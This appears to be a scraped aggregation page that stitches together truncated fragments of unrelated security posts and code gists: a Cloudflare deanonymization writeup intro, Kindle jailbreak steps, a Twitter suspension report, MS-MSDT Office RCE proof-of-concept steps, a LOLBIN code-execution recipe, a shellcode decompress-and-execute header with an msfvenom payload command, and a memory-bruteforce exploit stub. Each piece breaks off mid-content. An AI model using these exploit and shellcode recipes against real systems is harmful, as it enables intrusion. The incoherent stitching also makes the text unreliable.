mrpnkt mrpnkt

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

🖥️ See Demo

3.5 fps, Paperwhite 3
@adtac_

step 1: jailbreak your Kindle

mobileread.com is your best resource here, follow the instructions from the LanguageBreak thread

I didn't really follow the LanguageBreak instructions because I didn't care about most of the features + I was curious to do it myself, but the LanguageBreak github repo was invaluable for debugging

Elon Musk's suspension reversals

The tables below show notable Twitter suspension reversals for each day since Elon Musk took over as owner and CEO.

All dates indicate when the suspension or reversal was detected, and the actual suspension or reversal may have been earlier. For most English-language accounts with large followings, this lag will generally not be longer than a few hours, but for accounts that have a small number of followers or that are outside the networks we are tracking, the difference can be larger, and in some cases an account on the list may have had its suspension reversed before 27 October 2022. These dates will get more precise as we refine the report.

Because of these limitations, this report should be considered a starting point for investigation, not a definitive list of suspension reversals.

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

	function Get-RdpLogonEvent
	{
	[CmdletBinding()]
	param(
	[Int32] $Last = 10
	)

	$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
	LogName='Security'
	ProviderName='Microsoft-Windows-Security-Auditing'

	<#
	Meta
	Date: 2022 March 28th
	Updated: 2023 October 6th
	Authors: Dray Agha (Twitter @purp1ew0lf), Dipo Rodipe (Twitter @dipotwb)
	Company: Huntress Labs
	Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab.
	#>

	################################################################################################################

	*Purpose
	- UI Accessibility Checker
	- Verifies UI accessibility requirements

	*LOLBIN Functionality/Steps
	1) Go to "Custom Verification Routines" link in reference section and copy the sample verification C# code into Visual Studio.
	2) Add proper assembly references (e.g. AccCheck.dll)
	3) Insert your C# code under a target method such as Execute()
	4) Compile to a .NET managed library (DLL)
	5) Invoke the code

	//Decompressing shellcode and execution via callback
	//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\DecompressExecute.cs
	//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
	//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor

	// Step 1: generate shellcode
	// Msfvenom: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o calc.bin

	// Step 2: Compress the shellcode with my compress.cs gist here: https://gist.github.com/Wra7h/4d56791c2d0b5c1f27a67f3bc0ab924d
	// Compression command: .\compress.exe -in C:\path\to\calc.bin -out .\LZMScalc.bin -alg 5

	from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
	import sys
	import re

	vbaparser = VBA_Parser(sys.argv[1])

	replace_regex = r"\s([^=]+)\s=\sReplace\(\s([^,]+)\s,\s\"([^,])\"\s,\s\"([^,])\"\s*\)"
	replace = re.compile(replace_regex, re.MULTILINE)

	regex_url = "http(s)?://[^,\"]+"

	// memBruteforce.cpp by [email protected]
	// brute search loaded moudules in memory
	// rewrite from https://www.exploit-db.com/exploits/45293
	#include <Windows.h>
	#include <iostream>
	#pragma warning(disable:4996)

	bool isMemExist(size_t addr) {
	int retv;
	__asm {